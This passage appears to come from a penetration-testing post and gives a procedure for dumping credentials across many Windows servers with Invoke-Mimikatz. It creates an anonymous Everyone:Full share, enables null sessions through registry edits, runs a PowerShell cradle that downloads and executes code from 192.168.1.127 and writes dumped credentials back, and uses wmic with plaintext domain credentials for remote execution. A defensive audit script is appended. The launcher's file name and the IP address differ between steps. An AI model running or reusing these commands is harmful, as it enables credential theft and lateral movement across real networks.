- Make Share:
cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t
- Set registry keys (done by the massmimi_reg.rb meterpreter script; the equivalent reg.exe commands are shown here since `reg change` is not a valid reg.exe verb):
reg add HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v NullSessionShares /t REG_MULTI_SZ /d open /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
- Change directory into the new "open" directory
- Upload the PowerShell launcher script (powermeup.cmd); note the closing quote, which the original line was missing:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1"
- Upload clymb3r's Invoke-Mimikatz.ps1 - download it from the PowerSploit repo: source on github
- Upload mongoose: Downloads Page - both the regular and tiny versions work
- Upload serverlist.txt - a line-by-line list of computer names to run mimikatz on
- Execute mongoose (from the directory containing Invoke-Mimikatz.ps1) - this starts a web server with directory listings enabled on port 8080 by default
- Execute wmic:
wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"
- 9a. Execute wmic with explicit credentials (alternative to the previous step):
wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"
- Kill the mongoose process
- Remove the share: net share open /delete
- Remove the registry values set earlier (NullSessionShares and EveryoneIncludesAnonymous)
- Delete the "open" directory
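To check a host for the exposure this setup creates (or to verify that the cleanup steps above actually took effect), here is an added PowerShell audit script; it is not from the original post and assumes an elevated session and the SmbShare module (Windows 8 / Server 2012 or later).

```powershell
# Added audit script (not part of the original post). Flags the three
# conditions the procedure above relies on: NullSessionShares populated,
# EveryoneIncludesAnonymous = 1, and any non-admin share where Everyone
# has Full access. Assumes an elevated session and the SmbShare module.

$findings = @()

# 1. Null-session shares (anonymous SMB access to named shares)
$srv = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$nullShares = (Get-ItemProperty -Path $srv -Name NullSessionShares -ErrorAction SilentlyContinue).NullSessionShares
if ($nullShares) {
    $findings += "NullSessionShares is set: $($nullShares -join ', ')"
}

# 2. LSA flag that makes anonymous users members of Everyone
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$eia = (Get-ItemProperty -Path $lsa -Name EveryoneIncludesAnonymous -ErrorAction SilentlyContinue).EveryoneIncludesAnonymous
if ($eia -eq 1) {
    $findings += 'EveryoneIncludesAnonymous = 1 (anonymous sessions receive Everyone permissions)'
}

# 3. Shares (excluding admin shares ending in $) granting Everyone Full control.
#    'Everyone' is the English account name; adjust on localized systems.
Get-SmbShare | Where-Object { $_.Name -notmatch '\$$' } | ForEach-Object {
    $share = $_
    $open = Get-SmbShareAccess -Name $share.Name | Where-Object {
        $_.AccountName -eq 'Everyone' -and
        $_.AccessRight -eq 'Full' -and
        $_.AccessControlType -eq 'Allow'
    }
    if ($open) {
        $findings += "Share '$($share.Name)' ($($share.Path)) grants Everyone Full access"
    }
}

if ($findings.Count -eq 0) {
    'No null-session or Everyone:Full share exposure found.'
} else {
    $findings | ForEach-Object { "[!] $_" }
}

# Remediation, commented out so the script is read-only by default:
# Remove-ItemProperty -Path $srv -Name NullSessionShares
# Set-ItemProperty -Path $lsa -Name EveryoneIncludesAnonymous -Value 0
```

Run it on the host that served the share after the cleanup steps, and on any file server where these values should never be set.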